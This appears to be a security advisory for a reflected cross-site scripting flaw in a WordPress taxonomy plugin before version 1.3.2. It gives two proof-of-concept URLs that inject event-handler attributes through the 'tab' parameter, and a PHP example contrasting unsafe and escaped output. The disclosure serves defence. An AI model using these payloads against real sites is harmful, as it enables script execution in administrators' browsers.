
Select All Categories and Taxonomies < 1.3.2 - Reflected Cross-Site Scripting (XSS)

Description

The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue.

PoC

https://example.com/wp-admin/options-general.php?page=moove-taxonomy-settings&tab=" onMouseOver="alert(1);

https://example.com/wp-admin/options-general.php?page=moove-taxonomy-settings&tab="+style%3D"animation-name%3Aspinner"+onanimationstart%3D"alert(%2FXSS%2F)
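The pattern the description points to, as an added example: hypothetical code, not the plugin's source (which this page does not show), with a `tab` value echoed into an HTML attribute next to a hardened form. The tab names in `ALLOWED_TABS`, the function names and the markup are assumptions.

```php
<?php
// Added illustration; hypothetical code, not taken from the plugin.
// Constructed input: the first PoC value of the `tab` parameter from the advisory.
$_GET['tab'] = '" onMouseOver="alert(1);';

// Hypothetical tab names; the plugin's real tab identifiers are not on the page.
const ALLOWED_TABS = ['general', 'advanced'];

// Vulnerable pattern: the raw parameter is concatenated into an attribute value,
// so a double quote in `tab` closes href="..." and starts a new attribute.
function render_tab_unsafe(array $query): string {
    $tab = $query['tab'] ?? 'general';
    return '<a class="nav-tab" href="?page=moove-taxonomy-settings&tab=' . $tab . '">Tab</a>';
}

// Hardened pattern: allowlist the value, then encode for the attribute context.
function render_tab_safe(array $query): string {
    $tab = $query['tab'] ?? 'general';
    if (!is_string($tab) || !in_array($tab, ALLOWED_TABS, true)) {
        $tab = 'general'; // unknown or non-string values fall back to a fixed default
    }
    $href = '?page=moove-taxonomy-settings&tab=' . rawurlencode($tab);
    // Inside WordPress, esc_attr() is the function to call here; htmlspecialchars()
    // with ENT_QUOTES stands in for it so this file runs without WordPress loaded.
    return '<a class="nav-tab" href="' . htmlspecialchars($href, ENT_QUOTES, 'UTF-8') . '">Tab</a>';
}

// Unsafe output: the anchor gains an attacker-supplied onMouseOver attribute.
echo render_tab_unsafe($_GET), PHP_EOL;

// Safe output: the value is not on the allowlist, so the default tab is rendered.
echo render_tab_safe($_GET), PHP_EOL;

// Encoding alone already keeps the value inside the attribute: " becomes &quot;.
echo htmlspecialchars($_GET['tab'], ENT_QUOTES, 'UTF-8'), PHP_EOL;
```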


Affected Software


CPE Name Name Version
select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons 1.3.2
